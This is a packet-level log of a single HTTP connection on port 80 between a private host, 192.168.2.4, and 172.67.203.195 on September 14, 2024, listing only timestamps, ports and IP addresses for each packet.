Sep 14, 2024 18:31:07.892255068 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.030612946 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.030648947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.030724049 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.030770063 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.030808926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.030843019 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.030877113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.030910015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.030945063 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.030975103 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.031007051 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.031044006 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.031095982 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.031095982 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.031095982 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.031095982 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.035868883 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.036053896 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.036087990 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.036132097 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.036184072 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.117645979 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.117701054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.117737055 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.117770910 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.117805004 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.117837906 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.117921114 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.117921114 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.117921114 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.118078947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.118108034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.118164062 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.118207932 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.118292093 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.118325949 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.118355036 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.118383884 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.118417978 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.118451118 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.118457079 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.118508101 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.119271994 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.119322062 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.119355917 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.119373083 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.119411945 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.119446993 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.119462013 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.119482040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.119528055 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.120136976 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.120193005 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.120222092 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.120248079 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.161128998 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.161175966 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.161196947 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.161398888 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.204425097 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.204492092 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.204524994 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.204559088 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.204581022 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.204593897 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.204647064 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.204647064 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.204680920 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.204749107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.204766989 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.204798937 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.204812050 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.204834938 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.204866886 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.204886913 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.204900026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.204956055 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.204958916 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.205665112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.205698967 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.205724001 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.205750942 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.205785036 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.205810070 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.205820084 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.205852985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.205873966 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.205888033 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.205921888 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.205945969 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.206600904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.206645012 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.206660032 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.206696987 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.206729889 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.206763029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.206763983 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.206796885 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.206820965 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.206831932 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.206866980 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.206887007 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.207459927 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.207515955 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.207518101 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.207550049 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.207602978 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.207611084 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.207637072 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.207672119 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.207695961 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.207706928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.207741976 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.207762957 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.208667040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.208700895 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.208731890 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.208754063 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.208787918 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.208811045 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.208822012 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.208856106 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.208878040 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.246764898 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.246798992 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.246831894 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.246865034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.246874094 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.246898890 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.246927977 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.246941090 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.247073889 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.291560888 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.291604996 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.291649103 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.291666985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.291701078 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.291718006 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.291753054 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.291785002 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.291820049 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.291848898 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.291882992 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.291917086 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.291922092 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.291949987 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.292011976 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.292012930 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.292053938 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.292109013 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.292143106 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.292165995 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.292176962 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.292228937 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.292229891 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.292263985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.292318106 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.292654037 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.292687893 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.292741060 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.292745113 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.292774916 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.292808056 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.292848110 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.292859077 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.292893887 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.292921066 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.292927027 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.292960882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.292980909 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.292993069 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.293037891 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.293051004 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.294699907 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.294751883 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.294763088 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.294787884 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.294837952 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.294846058 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.294872999 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.294924021 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.294950008 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.294959068 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.294991016 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.295020103 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.295022964 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.295057058 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.295097113 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.295109034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.295144081 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.295169115 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.295177937 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.295211077 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.295232058 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.295243979 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.295278072 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.295295954 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.295309067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.295361042 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.295367002 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.295413017 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.295466900 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.295473099 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.295520067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.295571089 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.295577049 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.295604944 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.295638084 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.295660973 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.295672894 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.295705080 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.295727015 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.295738935 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.295770884 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.295799971 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.295804977 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.295839071 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.295860052 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.295872927 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.295905113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.295923948 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.295937061 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.295972109 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.295989990 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.296005011 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.296040058 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.296057940 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.296291113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.296344042 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.296350002 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.296380043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.296432018 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.296435118 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.296464920 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.296499014 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.296519995 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.296531916 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.296565056 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.296582937 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.334278107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.334331989 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.334386110 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.334418058 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.334450960 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.334482908 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.334480047 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.334481001 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.334516048 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.334547997 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.334582090 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.334590912 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.334590912 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.334614992 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.334644079 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.334649086 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.334709883 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.365273952 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.379662991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.379834890 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.379864931 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.380001068 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.380021095 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.380053043 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.380085945 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.380088091 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.380122900 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.380142927 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.380176067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.380209923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.380234003 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.380244017 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.380295992 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.380297899 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.380347013 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.380381107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.380403996 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.380414009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.380445957 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.380470037 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.380496025 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.380527973 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.380552053 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.380562067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.380594015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.380614996 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.380662918 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.380693913 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.380717039 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.380728006 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.380764008 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.380784988 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.380815029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.380842924 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.380868912 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.380877018 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.380911112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.380932093 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.380943060 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.380976915 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.380995035 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.381009102 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.381042004 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.381064892 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.381076097 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.381108999 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.381131887 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.381141901 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.381175041 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.381201029 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.381206989 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.381241083 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.381263971 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.381273031 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.381304979 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.381325960 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.381355047 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.381392956 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.381419897 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.381423950 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.381458044 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.381479979 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.381490946 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.381525040 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.381548882 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.381557941 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.381592035 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.381613016 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.381705046 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.381738901 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.381764889 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:08.381772041 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:08.381805897 CEST	80	49738	172.67.203.195	192.168.2.4
